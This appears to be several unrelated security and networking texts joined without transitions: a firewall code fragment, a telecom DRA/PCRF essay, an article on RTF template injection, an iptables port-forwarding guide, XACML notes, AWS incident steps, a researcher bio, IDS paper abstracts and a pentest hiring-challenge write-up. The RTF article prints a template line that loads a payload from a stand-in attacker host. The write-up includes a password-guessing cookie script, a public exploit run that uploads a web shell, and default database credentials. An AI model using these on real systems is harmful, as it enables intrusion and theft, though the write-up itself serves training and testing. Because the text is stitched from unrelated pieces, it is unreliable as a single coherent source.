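        if pkt.get("flags") == "FIN":            # connection teardown
            sessions.discard(key)
            sessions.discard(reverse)
        return True
    # No match: the packet undergoes the policy check for a new connection.
    if pkt.get("flags") == "SYN" and pkt["dport"] in POLICY_ALLOWED_PORTS:
        sessions.add(key)                        # store the new session
        return True
    return False                                 # fails policy -> rejected

syn = {"src": "10.0.0.5", "sport": 5050, "dst": "203.0.113.7", "dport": 443,
       "proto": "tcp", "flags": "SYN"}
print(allow(syn))  # True: new session stored; the reply traffic will match it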
To begin, we should ask what are the intended functionalities of a Diameter Routing Agent (DRA) and a Policy Charging & Rules Function (PCRF). A PCRF is the Policy Decision Point (PDP) virtually cut-and-pasted into IMS and afterwards taken by the 3GPP who awarded it with a new acronym based on the older concept of policy based networking. It is a place where business rules are merged with network actor information (in the case of mobile, subscribers). It acts as a centralized engine for deploying policy to enforcement points in a specific, limited domain (in the case of mobile, usually a MSC, APN, or geographic region). In theory, upstream from the PCRF the business rules themselves are stored in a rules base (the SPR), and the user information is stored in a directory (the HSS or UPSF) and the execution of the policy (rules+user+context) is done downstream by policy enforcement points. However, this theory isn’t always strictly translated to practice. A DRA is a message switching engine that acts on a peer-to-peer network to perform proxy, translation, routing, and relay actions against messages. This is analogous to how the packet switching engine in a network element performs proxy, translation, routing, and relay actions against Ethernet/IP frames (L2-4) but it is performed on the L7 Diameter message in the context of the named interface application. It is deployed as a strategic point of control to direct Diameter message delivery in the EPC and IMS control plane; facilitates message-proxy, horizontal scaling for control plane elements that cannot scale (load balancing); provides virtual end-points to secure and simplify external communications (virtual servers /DEA); enhances interoperability by performing translation (interop fix-up); bridges between 3GPP and Web 2.0 messaging and architectures; and creates mechanisms for the capture, distribution of, and action on information contained in messages across domains or subsystems in the EPC and IMS (the message switching stratum). So, given those definitions, should the function of a DRA be separate from the PCRF function? Firstly, they don’t have anything to do with one another other than they are both Diameter peers. Another way to think of it is to ask why would someone separate the routing and switching function from the SMTP and IMAP function? They both use TCP/IP, so why not put them in the same sheet metal? Deploying a DRA as part of an EPC or IMS functional element is like deploying a L3 switch as the NIC for a server; there isn’t anything wrong with doing that, but you’d better have a way to justify the cost and tame the operational complexity of doing that if all you really need is a NIC. Secondly, the PCRF is part of the Policy Control and Charging (PCC) subsystem and the Integrated Multimedia Subsystem (IMS). Those are only two functional domains in the EPC and IMS, so by integrating the DRA into the PCRF you’ve created a hurdle to provisioning that function in the Mobility subsystem, the roaming subsystem/internetworking function, the integration of fixed access, and the visibility and reporting subsystems necessary to actually operate the packet core. Thirdly, by choosing an embedded DRA over a message switching stratum for the EPC control plane, the operator is hitching scalability embedded in the DRA function to the expandability of the rest of those functional elements. 
This is the same conundrum that the dynamic datacenter faces when trying to embed ADC functionality into the elastic compute node; these two functions have different scaling metrics, different utilization curves, and different scaling requirements. Just as OpenFlow and network virtualization don't solve that for the cloud, there isn't a viable solution for the elastic packet core. Finally, when you don't have a message switching stratum in the EPC control plane (and that also extends to the VoLTE functions of the IMS core), you lack a mechanism to apply policy end-to-end on the network, or to deploy offerings that extend policy to roaming customers to enhance value. Instead you have a heterogeneous mix of DRA-like functionalities that may or may not interoperate in a way that can be operationalized, some of which are controlled by the vendor of the function, who has a vested interest in not participating in an end-to-end policy architecture. Put another way, operators who are content to become commoditized dumb pipes shouldn't deploy embedded DRA functionality in their EPC functional elements, because they aren't going to operationalize or monetize their networks with policy-based-networking-driven product offerings. All they really need is a Diameter stack with a static configuration to maximize the fixed-configuration economics required for commodity access providers. Conversely, operators that do intend to pursue value above connectivity should invest in a message switching stratum, because they cannot currently deploy the DevOps apparatus required to tame the operational complexity associated with managing embedded DRA elements in a high-capacity, dynamic, heterogeneous network to deliver policy-based offerings that customers will pay extra for (because such an apparatus does not currently exist). Vendors and system integrators will maximize their short-term revenue by selling integrated DRA function at a premium rate. And by doing so, they ensure that functional systems are forced to scale in the least cost-effective way as traffic increases. However, they do so with the risk that their solution will be prematurely re-evaluated when the need to deploy a message switching stratum arises.
Hackers Are Using RTF Files in Phishing Campaigns

Hackers are increasingly using an RTF template injection technique to phish for information from victims. Three APT hacking groups from India, Russia, and China used a novel RTF template injection technique in their recent phishing campaigns. Researchers at Proofpoint first spotted the malicious RTF template injections in March 2021, and the firm expects the technique to become more widely used as time goes on. Here's what's happening, according to Proofpoint: This technique, referred to as RTF template injection, leverages the legitimate RTF template functionality. It subverts the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via an RTF's template control word capability. This enables a threat actor to replace a legitimate file destination with a URL from which a remote payload may be retrieved. To put it simply, threat actors place malicious URLs in the RTF file through the template function (a simplified illustration appears at the end of this article), which can then load malicious payloads into an application or perform Windows New Technology LAN Manager (NTLM) authentication against a remote URL to steal Windows credentials, which could be disastrous for the user who opens these files. Where things get really scary is that these files have a lower detection rate by antivirus apps when compared to the well-known Office-based template injection technique. That means you might download the RTF file, run it through an antivirus app and think it's safe when it's hiding something sinister. So what can you do to avoid it? Simply don't download and open RTF files (or any other files, really) from people you don't know. If something seems suspicious, it probably is. Be careful what you download, and you can mitigate the risk of these RTF template injection attacks.
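For illustration only: the injection boils down to an RTF template control word whose destination is a remote URL instead of a local file path. A minimal, hypothetical fragment might look like the following (the URL is a placeholder, and real samples are considerably more convoluted):

{\rtf1
{\*\template http://attacker.example/payload.rtf}
...document body...
}

When an application opens such a file, it attempts to retrieve the remote resource named by the template control word, which is what lets the attacker deliver a payload or trigger NTLM authentication.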
In an organization, we sometimes need to expose internal services to the outside world. If a system administrator needs to access a remote Windows machine, a VNC server, or similar from the outer network, what do we do? Port forwarding is the best option to get through the gateway; just be sure to review the security implications before forwarding a port. The public IP address is configured on the gateway, which is set up for NAT routing. NAT routing lets internal users access the outside world: an internal user's request (e.g., HTTP, FTP, or any other port) is sent to the gateway, and from the gateway it goes out to the web. The outside world can only access the internal network with the help of the system administrator, who creates careful routing rules on the gateway to grant access without compromising the security of the internal network, servers, and so on. Here I am explaining port forwarding using iptables commands, exposing an internal Windows remote machine outside the gateway. The command used to forward the request from the public address to the internal machine is a DNAT rule (a sketch is shown below): it forwards the VNC viewer port request arriving at the public IP address to the internal VNC server machine's port. Make sure to set a good, secure password to prevent the machine from being hacked.

1. Edit the file inside the APF installation directory:

# vi /etc/apf/preroute.rules

Add the same iptables rule into the file and reload APF. Make changes to the iptables port-forwarding rule according to your needs.

2. Reload APF to make the port-forwarding rule effective:

# apf -r
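A minimal sketch of such a rule, assuming a placeholder public address of 203.0.113.10 on the gateway and an internal VNC server at 192.168.1.20 listening on the default VNC port 5900 (adjust addresses and ports to your environment):

iptables -t nat -A PREROUTING -p tcp -d 203.0.113.10 --dport 5900 -j DNAT --to-destination 192.168.1.20:5900
iptables -A FORWARD -p tcp -d 192.168.1.20 --dport 5900 -j ACCEPT

The first rule rewrites the destination of VNC traffic arriving at the gateway's public address; the second allows the forwarded traffic through the FORWARD chain.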
The eXtensible Access Control Markup Language (XACML) is an XML dialect for the server-side representation of access control policy and access control decisions. These rules can be expressed in an application-independent manner, making the language versatile. XACML policies can reference other policies and can intelligently combine policies with competing or overlapping rule sets. If the provided combining algorithms are not sufficient, application developers can define their own as needed. XACML can be used to implement Attribute Based Access Control (ABAC). Traditional access control methods, such as Identity Based Access Control (IBAC) or the newer Role Based Access Control (RBAC), associate access permissions directly with a subject identity, or with the role that subject is attempting to perform. IBAC, in which an access policy needs to be defined for every identity, is a method which does not scale well and is repetitive and redundant. RBAC requires that access policies be defined for all roles in the system, and then subject identities are mapped to those roles. This scales better, but still has limitations from its one-dimensional view. RBAC generally requires centralized management of the user-to-role and permission-to-role assignments, which is not well suited to a highly distributed environment, or to an environment with subjects and resources belonging to different security domains. ABAC is a newer method in which policy rules are defined on attributes of subjects (users, applications, processes, etc.), resources (web service, data, etc.), and environment (time, threat level, security classification, etc.). This allows for a much finer-grained access control policy than what can be achieved with RBAC (a tiny sketch of the idea appears at the end of this section). Of particular note is the ability to use security classification labels to create rules, allowing XACML policies to be used in conjunction with the needs of a secure operating system's Mandatory Access Control (MAC) system. ViewDS Directory supports the X.500 Basic and Simplified Access Control schemes, which offer fine-grained authorization controls that generally apply to identities directly or to groups of identities. ViewDS Directory provides extensions to the fine-grained X.500 access control models to allow users to be identified through roles or, more generally, through any attribute associated with identities. Through ViewDS Directory's support for XML, XACML policies can be stored, validated and indexed within a ViewDS Directory server. This allows ViewDS Directory to be used as a Policy Administration Point (PAP) and Policy Information Point (PIP) by XACML Policy Decision Point (PDP) software.
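To make the ABAC idea concrete, here is a tiny, hypothetical Python sketch (not XACML syntax): rules are predicates over subject, resource, and environment attributes, combined with deny-overrides, one of the standard XACML combining algorithms. All attribute names and thresholds are made up for illustration.

def deny_overrides(decisions):
    # One of XACML's standard combining algorithms: any Deny wins.
    if "Deny" in decisions:
        return "Deny"
    return "Permit" if "Permit" in decisions else "NotApplicable"

RULES = [
    # Subjects may read resources at or below their clearance level.
    lambda sub, res, env: "Permit" if sub.get("clearance", 0) >= res.get("classification", 0) else "Deny",
    # Environment attribute: deny everything when the threat level is high.
    lambda sub, res, env: "Deny" if env.get("threat_level") == "high" else "NotApplicable",
]

def evaluate(subject, resource, environment):
    return deny_overrides([rule(subject, resource, environment) for rule in RULES])

print(evaluate({"clearance": 3}, {"classification": 2}, {"threat_level": "low"}))   # Permit
print(evaluate({"clearance": 3}, {"classification": 2}, {"threat_level": "high"}))  # Deny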
The benefits of cloud adoption are clear: greater speed, agility and efficiency. But it also comes with new challenges, and a single security breach can quickly shut down an entire business. The accessibility of the public cloud opens the door to the exploitation of insecure infrastructure access points. That makes it increasingly difficult, and important, to protect data and workloads as industries become more and more dependent on the cloud. Compromised AWS accounts are highly dangerous for enterprises. Whatever the cause -- external hacking or a disgruntled employee -- the first order of business is to isolate the affected AWS accounts and minimize damage before it is too late.

Negate the damage of hacked AWS accounts

If you have a compromised AWS Identity and Access Management (IAM) user account, immediately disable its access and privileges. Follow this step-by-step procedure (a scripted sketch of the first containment steps appears at the end of this article):
- Go to the IAM console, and detach all policies connected to the user. This stops that user from taking any further action if he or she is already logged in to the web console.
- Next, go to the Security credentials tab, and disable the account's console password and access keys.
- After you stop the compromised account from causing more harm, assess the damage already done. If the user deleted data, it is most likely lost forever -- unless you have backups. But if the user started some resources -- to cause financial damage, for example -- you should immediately locate and stop them. AWS CloudTrail helps with this, as it provides logs and visibility into all API calls a user makes. This helps administrators track down changes in their infrastructure if, for example, the attacker opened a port in a security group for later exploitation.
- Next, make sure you check and rotate all of your AWS credentials. Also, be sure to assess Active Directory or Lightweight Directory Access Protocol if applicable.

CloudTrail can help identify which AWS accounts are compromised, so make sure to enable CloudTrail logging to contain the attack and perform the post-mortem analysis. If an AWS root account is compromised, you have a much more significant problem. If the attacker gained access to the root account and changed the password, contact AWS Support, and wait for a specialist to retrieve your account, which could take 24 to 48 hours. During that time, you should review the best practices to secure your account, because there's not much else you can do.
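A scripted version of the first two containment steps can be handy when speed matters. The following is a minimal boto3 sketch under stated assumptions: the caller holds IAM administrative credentials, the user name is a hypothetical placeholder, and pagination is omitted for brevity.

import boto3

iam = boto3.client("iam")
user = "compromised-user"  # hypothetical user name

# Step 1: detach managed policies and delete inline policies so the user loses privileges.
for pol in iam.list_attached_user_policies(UserName=user)["AttachedPolicies"]:
    iam.detach_user_policy(UserName=user, PolicyArn=pol["PolicyArn"])
for name in iam.list_user_policies(UserName=user)["PolicyNames"]:
    iam.delete_user_policy(UserName=user, PolicyName=name)

# Step 2a: disable console access; the call raises if no password was ever set.
try:
    iam.delete_login_profile(UserName=user)
except iam.exceptions.NoSuchEntityException:
    pass

# Step 2b: deactivate all access keys belonging to the user.
for key in iam.list_access_keys(UserName=user)["AccessKeyMetadata"]:
    iam.update_access_key(UserName=user, AccessKeyId=key["AccessKeyId"], Status="Inactive")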
Salvatore J. Stolfo

Born in Brooklyn, New York, Stolfo received a Bachelor of Science degree in Computer Science and Mathematics from Brooklyn College in 1974. He received his Ph.D. from the NYU Courant Institute in 1979 and has been on the faculty of Columbia ever since, where he has taught courses in Artificial Intelligence, Intrusion and Anomaly Detection Systems, Introduction to Programming, Fundamental Algorithms, Data Structures, and Knowledge-Based Expert Systems. While at Columbia, Stolfo has received close to $50M in funding for research that has broadly focused on security, intrusion detection, anomaly detection, and machine learning, and that includes early work in parallel computing and artificial intelligence. He has published or co-authored over 250 papers and has over 21,000 citations with an h-index of 67. In 1996 he proposed a project with DARPA that applies machine learning to behavioral patterns to detect fraud or intrusion in networks. Among his earliest work, Stolfo, along with colleague Greg Vesonder of Bell Labs, developed a large-scale expert data analysis system called ACE (Automated Cable Expertise) for the nation's phone system. AT&T Bell Labs distributed ACE to a number of telephone wire centers to improve the management and scheduling of repairs in the local loop. Stolfo coined the term FOG computing (not to be confused with fog computing), in which technology is used "to launch disinformation attacks against malicious insiders, preventing them from distinguishing the real sensitive customer data from fake worthless data." He was elevated to IEEE Fellow in 2018 "for his contributions to machine learning based cybersecurity." Red Balloon Security (RBS), founded in 2011 by Dr. Sal Stolfo and Dr. Ang Cui, is a cybersecurity company. A spinout from the IDS lab, RBS developed a symbiote technology called FRAK as a host defense for embedded systems under the sponsorship of DARPA's Cyber Fast Track program. Dr. Sal Stolfo and Dr. Angelos Keromytis founded Allure Security Technologies based on their IDS lab research for the DARPA Active Authentication and Anomaly Detection at Multiple Scales programs, using the active behavioral authentication and decoy technology Stolfo pioneered and patented in 1996. Founded in 2009, Allure Security Technology was created based on work done under DARPA sponsorship in Columbia's IDS lab, following DARPA prompts to research how to detect hackers once they are inside an organization's perimeter and how to continuously authenticate a user without a password. Stolfo's company Electronic Digital Documents produced a "DataBlade" technology, which Informix marketed during its strategy of acquisition and development in the mid-'90s. Stolfo's patented merge/purge technology, the EDD DataCleanser DataBlade, was licensed by Informix. Since its acquisition by IBM in 2001, IBM Informix has been one of the world's most widely used database servers, with users ranging from the world's largest corporations to startups. System Detection was one of the companies founded by Prof. Stolfo to commercialize the anomaly detection technology developed in the IDS lab. The company ultimately reorganized and was rebranded as Trusted Computer Solutions. That company was recently acquired by Raytheon.
PREDICT MALICIOUS OR MISUSE BEHAVIORS
Cybercriminals are becoming better organized, more sophisticated and highly skilled in their malicious attempts to exploit vulnerabilities and weaknesses. Because of this, organizations' capability to predict malicious or misuse behaviors while containing their cybersecurity operational costs is challenged on a daily basis. ClearSkies™ Big Data Advanced Security Analytics provides real-time, in-depth statistical, behavioral, and predictive/machine learning security analytics. These tools help you identify suspicious cyberattack patterns and security anomalies that would otherwise go undetected by conventional SIEM systems.
NICE: Network Intrusion Detection and Countermeasure Selection in Virtual Network Systems
Cloud security is one of the most important issues that has attracted a lot of research and development effort in the past few years. In particular, attackers can explore vulnerabilities of a cloud system and compromise virtual machines to deploy further large-scale Distributed Denial-of-Service (DDoS) attacks. DDoS attacks usually involve early-stage actions such as multistep exploitation, low-frequency vulnerability scanning, and the compromise of identified vulnerable virtual machines as zombies, followed finally by DDoS attacks launched through the compromised zombies. Within the cloud system, especially Infrastructure-as-a-Service (IaaS) clouds, the detection of zombie exploration attacks is extremely difficult. This is because cloud users may install vulnerable applications on their virtual machines. To prevent vulnerable virtual machines from being compromised in the cloud, we propose a multiphase distributed vulnerability detection, measurement, and countermeasure selection mechanism called NICE, which is built on attack graph-based analytical models and reconfigurable virtual network-based countermeasures. The proposed framework leverages OpenFlow network programming APIs to build a monitor and control plane over distributed programmable virtual switches to significantly improve attack detection and mitigate attack consequences. The system and security evaluations demonstrate the efficiency and effectiveness of the proposed solution. In traditional data centers, where system administrators have full control over the host machines, vulnerabilities can be detected and patched by the system administrator in a centralized manner. However, patching known security holes in cloud data centers, where cloud users usually have the privilege to control the software installed on their managed VMs, may not work effectively and can violate the Service Level Agreement (SLA).
Detecting malicious behavior
Duan et al. focused on the detection of compromised machines that have been recruited to serve as spam zombies. Their approach, SPOT, is based on sequentially scanning outgoing messages while employing a statistical method, the Sequential Probability Ratio Test (SPRT), to quickly determine whether or not a host has been compromised. BotHunter detected compromised machines based on the fact that a thorough malware infection process has a number of well-defined stages that allow correlating the intrusion alarms triggered by inbound traffic with the resulting outgoing communication patterns. BotSniffer exploited the uniform spatial-temporal behavior characteristics of compromised machines to detect zombies by grouping flows according to server connections and searching for similar behavior in the flows.
An attack graph is able to represent a series of exploits, called atomic attacks, that lead to an undesirable state, for example a state where an attacker has obtained administrative access to a machine. There are many automated tools for constructing attack graphs (a toy illustration of attack-path enumeration follows below).
Binary Decision Diagrams (BDDs)
O. Sheyner et al. proposed a technique based on the modified symbolic model checker NuSMV and Binary Decision Diagrams (BDDs) to construct attack graphs. Their model can generate all possible attack paths; however, scalability is a big issue for this solution.
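To make the attack-graph idea concrete, here is a minimal, self-contained sketch of attack-path enumeration over a hand-written exploit graph. The graph, node names and exploit labels are all invented for illustration; real tools like those cited above derive the graph from vulnerability scan data.

# Toy attack graph: nodes are attacker privileges/states, edges are exploits.
# Hand-written example data; real tools build this from scan results.
ATTACK_GRAPH = {
    "internet": [("web-rce", "user@webserver")],
    "user@webserver": [("db-sqli", "user@dbserver"),
                       ("kernel-lpe", "root@webserver")],
    "user@dbserver": [("db-priv-esc", "root@dbserver")],
    "root@webserver": [("stolen-creds", "root@dbserver")],
    "root@dbserver": [],
}

def attack_paths(graph, state, goal, path=()):
    """Depth-first enumeration of exploit sequences that reach the goal."""
    if state == goal:
        yield path
        return
    for exploit, next_state in graph[state]:
        if next_state not in {s for _, s in path}:  # avoid revisiting states
            yield from attack_paths(graph, next_state, goal,
                                    path + ((exploit, next_state),))

for p in attack_paths(ATTACK_GRAPH, "internet", "root@dbserver"):
    print(" -> ".join(f"{e} ({s})" for e, s in p))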
Intrusion Detection System
IDS and firewalls are widely used to monitor and detect suspicious events in the network. False alarms and the large volume of raw alerts from an IDS are two major problems for any IDS implementation. Many attack-graph-based alert correlation techniques have been proposed recently. L. Wang et al. devised an in-memory structure, called a queue graph (QG), to trace alerts matching each exploit in the attack graph. The implicit correlations in this design make it difficult to use the correlated alerts in the graph for analysis of similar attack scenarios. Roschke et al. proposed a modified attack-graph-based correlation algorithm to create explicit correlations only by matching alerts to specific exploitation nodes in the attack graph with multiple mapping functions, and devised an alert dependencies graph (DG) to group related alerts with multiple correlation criteria.
Attack countermeasure tree
Roy et al. proposed an attack countermeasure tree (ACT) to consider attacks and countermeasures together in an attack tree structure. They devised several objective functions based on greedy and branch-and-bound techniques to minimize the number of countermeasures, reduce investment cost, and maximize the benefit from implementing a certain countermeasure set. In their design, each countermeasure optimization problem could be solved with and without probability assignments to the model. However, their solution focuses on a static attack scenario and a predefined countermeasure for each attack. N. Poolsappasit et al. proposed a Bayesian attack graph (BAG) to address the dynamic security risk management problem and applied a genetic algorithm to solve the countermeasure optimization problem.
NICE (Network Intrusion detection and Countermeasure sElection in virtual network systems) is proposed to establish a defense-in-depth intrusion detection framework. For better attack detection, NICE incorporates attack graph analytical procedures into the intrusion detection processes. The design of NICE does not intend to improve any of the existing intrusion detection algorithms; instead, NICE employs a reconfigurable virtual networking approach to detect and counter attempts to compromise VMs, thus preventing zombie VMs. NICE deploys a lightweight mirroring-based network intrusion detection agent (NICE-A) on each cloud server to capture and analyze cloud traffic. A NICE-A periodically scans the virtual system vulnerabilities within a cloud server to establish Scenario Attack Graphs (SAGs), and then, based on the severity of the identified vulnerabilities with respect to the collaborative attack goals, NICE decides whether or not to put a VM in a network inspection state (a toy version of this kind of decision rule is sketched below). Once a VM enters the inspection state, Deep Packet Inspection (DPI) is applied, and/or virtual network reconfigurations can be deployed to the inspected VM to make the potential attack behaviors prominent. By using software switching techniques, NICE constructs a mirroring-based traffic capturing framework to minimize the interference on users' traffic compared to traditional bump-in-the-wire (i.e., proxy-based) IDS/IPS. NICE enables the cloud to establish inspection and quarantine modes for suspicious VMs according to their current vulnerability state in the current SAG. Based on the collective behavior of VMs in the SAG, NICE can decide appropriate actions, for example DPI or traffic filtering, on the suspicious VMs. Using this approach, NICE does not need to block the traffic flows of a suspicious VM in its early attack stage.
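The exact decision logic NICE uses is defined in the paper; the toy rule below merely illustrates the general shape of a severity-based choice among monitoring, inspection and quarantine. The scores and thresholds are invented for illustration.

# Toy decision rule in the spirit of NICE: choose an action for a VM based
# on the severity of its vulnerabilities and whether it lies on a path to
# an attack goal. Scores and thresholds are invented.
def choose_action(vm_vuln_scores, on_path_to_goal):
    """vm_vuln_scores: CVSS-like scores found on the VM by the scanner."""
    worst = max(vm_vuln_scores, default=0.0)
    if not on_path_to_goal or worst < 4.0:
        return "monitor"      # keep normal mirroring-based monitoring
    if worst < 7.0:
        return "inspect"      # enable DPI on the mirrored traffic
    return "quarantine"       # reconfigure the virtual network, isolate VM

print(choose_action([5.1, 3.3], on_path_to_goal=True))  # -> inspect
print(choose_action([9.8], on_path_to_goal=True))       # -> quarantine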
NICE significantly advances current network IDS/IPS solutions by employing a programmable virtual networking approach that allows the system to construct a dynamically reconfigurable IDS. NICE is a new multiphase distributed network intrusion detection and prevention framework for virtual networking environments that captures and inspects suspicious cloud traffic without interrupting users' applications and cloud services. NICE incorporates a software switching solution to quarantine and inspect suspicious VMs for further investigation and protection. Through programmable network approaches, NICE can improve the attack detection probability and the resiliency to VM exploitation attacks without interrupting existing normal cloud services. NICE employs a novel attack graph approach for attack detection and prevention by correlating attack behavior, and it also suggests effective countermeasures (a toy greedy countermeasure selection is sketched below). NICE optimizes its implementation on cloud servers to minimize resource consumption. Our study shows that NICE incurs less computational overhead than proxy-based network intrusion detection solutions.
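As a rough illustration of the countermeasure-selection problem discussed above, the sketch below greedily picks countermeasures by benefit-to-cost ratio under a budget. This is not Roy et al.'s ACT formulation or NICE's actual optimizer; all names and numbers are invented.

# Toy greedy countermeasure selection: maximize benefit under a budget.
# Data is invented; real formulations (e.g., ACT) use attack-tree structure.
countermeasures = [
    {"name": "patch-db",       "cost": 3, "benefit": 8},
    {"name": "filter-traffic", "cost": 1, "benefit": 3},
    {"name": "enable-dpi",     "cost": 2, "benefit": 4},
    {"name": "rebuild-vm",     "cost": 5, "benefit": 9},
]

def select(cms, budget):
    """Pick countermeasures in descending benefit/cost order until budget."""
    chosen, spent = [], 0
    for cm in sorted(cms, key=lambda c: c["benefit"] / c["cost"], reverse=True):
        if spent + cm["cost"] <= budget:
            chosen.append(cm["name"])
            spent += cm["cost"]
    return chosen

print(select(countermeasures, budget=6))
# -> ['filter-traffic', 'patch-db', 'enable-dpi']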
International Journal of Computer Science Issues
The Internet continues to expand exponentially, and Internet access is becoming more prevalent in users' daily lives, but at the same time web applications are becoming the most attractive targets for hackers and cybercriminals. This paper presents an enhanced intrusion detection system approach for detecting input validation attacks in web applications. Existing IDSs for input validation attacks are language dependent. The proposed IDS is language independent, i.e., it works for web applications developed in any language, such as Java, PHP or .NET. In addition, the proposed system detects directory traversal attacks, command injection attacks, cross-site scripting attacks and SQL injection attacks, which were not detected by the existing IDSs.
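The paper's own mechanism is not reproduced here, but a language-independent detector of the general kind it describes could screen raw HTTP parameters for attack signatures before they reach application code in any backend language. A minimal sketch with illustrative (and deliberately incomplete) patterns:

# Minimal sketch of language-independent input-validation screening:
# inspect raw HTTP parameter values, independent of the backend language.
# Patterns are illustrative only, not a complete or evasion-proof rule set.
import re

SIGNATURES = {
    "sql_injection":        re.compile(r"('|--|\bUNION\b|\bOR\b\s+\d+=\d+)", re.I),
    "cross_site_scripting": re.compile(r"(<script\b|onerror\s*=|javascript:)", re.I),
    "directory_traversal":  re.compile(r"(\.\./|\.\.\\|%2e%2e%2f)", re.I),
    "command_injection":    re.compile(r"([;&|`]\s*\w+|\$\(\w+)", re.I),
}

def screen(params):
    """Return a list of (parameter, attack_type) findings."""
    findings = []
    for name, value in params.items():
        for attack, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append((name, attack))
    return findings

print(screen({"q": "1 OR 1=1 --", "file": "../../etc/passwd"}))
# -> [('q', 'sql_injection'), ('file', 'directory_traversal')]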
Last year we decided to expand our pentest team, and we figured that offering a hands-on challenge would be a good filter for possible candidates, since we've accumulated quite a bit of experience from organizing wargames and CTFs at various events. We provided an isolated network with three hosts, and anyone could apply by submitting a name, an email address and a CV – we sent VPN configuration packs to literally everyone who did so. These packs included the following message (the original was in Hungarian).
Your task is to perform a comprehensive (!) security assessment of the hosts within range 10.10.82.100-254. Typical tasks of a professional penetration tester include
- asking relevant clarifying questions about new projects,
- writing the technical part of business proposals,
- comprehensive penetration testing,
- report writing and presentation.
That is why we decided to test the candidates' knowledge of the above subjects. The scope of the challenge consisted of 3 servers, report writing and a presentation to the technical staff, with a time limit of two weeks. Here is our solution:
As a warm-up exercise we created a simple web hacking challenge. Web applications are the most common targets in real-life projects and their typical vulnerabilities are well known. We created our challenge in the form of a modified WordPress installation: we killed some security features and added some new vulnerabilities either to the core or in the form of plug-ins. The default page of the web server was an empty "Index of" page that led some into thinking that there was nothing hosted on the server. In reality the vulnerable application was located under the /wp/ path, which could be easily discovered using most enumeration tools (like DirBuster). It shouldn't have taken long to stumble upon the first vulnerability: the search box right on the front page was vulnerable to reflected XSS. This vulnerability was meant to be a gift to encourage contestants with a little feeling of success. Unfortunately, only one report contained this finding. The blog also provided some means for authentication. First, there was a password-protected post that could be opened using the infamous password "asdf1234". The catch was that WordPress first hashes the password and places the hash in a cookie that is checked when rendering the post. This way standard login brute-forcers can't be used, but the problem can be solved in many ways. The crypt() method of WordPress can be reused to generate valid cookies, or the application can be used as an oracle to generate the appropriate headers – the point was to get the applicant to do some basic programming (or at least configuration) work; a sketch of the offline approach follows below. The second authentication interface is of course the WordPress login interface (wp-login.php). The teszt:teszt credentials were valid on the system (we are a Hungarian company, "test" is spelled "teszt" in Hungarian). This can be brute-forced with standard tools – if the wordlist is customized for the target. We also provided test accounts for the participants. The given credentials only provided privileges to change basic user information. Although the application sent CSRF tokens with this form, they were not checked by the server.
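To illustrate the offline cookie-forging approach mentioned above: WordPress stores the post password as a phpass-style hash in a wp-postpass_<COOKIEHASH> cookie, so candidate cookies can be generated locally and replayed. A minimal sketch, assuming the passlib library; the post URL and wordlist are placeholders, and details such as the exact COOKIEHASH input and the form marker can vary per installation.

# Sketch: offline generation of WordPress post-password cookies, replayed
# to test candidate passwords. Assumes the passlib library is installed;
# the target URL and wordlist are invented placeholders.
import hashlib
import requests
from passlib.hash import phpass

SITE = "http://10.10.82.153/wp"   # blog base URL
POST = SITE + "/?p=7"             # hypothetical protected post
COOKIEHASH = hashlib.md5(SITE.encode()).hexdigest()  # WP's COOKIEHASH

for candidate in ["password", "qwerty", "asdf1234"]:
    # WordPress stores phpass portable hashes ($P$...) of the post password.
    cookie = {f"wp-postpass_{COOKIEHASH}": phpass.hash(candidate)}
    body = requests.get(POST, cookies=cookie).text
    if "post-password-form" not in body:  # form gone => password accepted
        print("post password is:", candidate)
        break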
More serious vulnerabilities could be found by enumerating installed WordPress plugins – wpscan output:
[+] We found 3 plugins:
[+] Name: akismet - v2.5.9
 | Location: http://10.10.82.153/wp/wp-content/plugins/akismet/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/akismet/readme.txt
[+] Name: sexy-contact-form - v0.9.6
 | Location: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/readme.txt
[!] Title: Creative Contact Form
 Reference: https://wpvulndb.com/vulnerabilities/7652
 Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8739
 Reference: http://www.exploit-db.com/exploits/35057/
[i] Fixed in: 1.0.0
[+] Name: simple-login-log - v1.1.0
 | Location: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/readme.txt
First take a look at Simple Login Log, which "tracks user name, time of login, IP address and browser user agent". Doing some simple tests on the User-Agent header on login shows that (our version of) the plugin is vulnerable to blind SQL injection.
The Sexy Contact Form is an interesting beast: when we installed the site last August we threw in random plugins to make the application more "interesting". One of these plugins was SCF, which turned out to be vulnerable to remote code execution last October. We left the plugin enabled to see if anyone would notice it. No one did, although even the published exploit works out-of-the-box:
$ python 35057.py -t http://10.10.82.153/wp/ -c wordpress -f shell.php
[...snip...]
[!] Shell Uploaded
[!] http://10.10.82.153/wp//wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php
Although the web challenge may seem like the easiest one, we tried to insert some more subtle vulnerabilities that would require more thinking and manual work from the contestants. The challenge aimed to test whether the contestant
- has a good overview of web application security, and
- takes care of every detail of the target.
Sadly, most of them only used fully automated tools, which couldn't even recognize the most basic XSS (or even find the app). Nobody was able to find the CSRF, the post password, the SQLi or the RCE.
The second challenge was located at 10.10.82.242. A simple port scan shows that there are some Oracle services listening:
Starting Nmap 6.25 ( http://nmap.org ) at 2015-04-01 09:41 CEST
Nmap scan report for 10.10.82.242
Host is up (0.021s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
53/tcp open domain dnsmasq 2.45
111/tcp open rpcbind 2 (RPC #100000)
1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.3.0 (for Linux)
30316/tcp open oracle-tns Oracle TNS listener
From here the task was rather simple. One could follow basically any Oracle hacking tutorial to gain access to the database. First we needed to find some valid SIDs. Then we could use the default wordlist of Metasploit to find some valid accounts. As we could see, there were accounts with the DBA role registered using default credentials. Even the good old scott:tiger combination was valid, and the database was vulnerable to multiple privilege escalation attacks. The time to DBA-level access was comparable to the startup time of Metasploit – although it never hurts to have our tools properly configured, of course. Since DBA-level access was easy to achieve, OS-level command execution could also be performed.
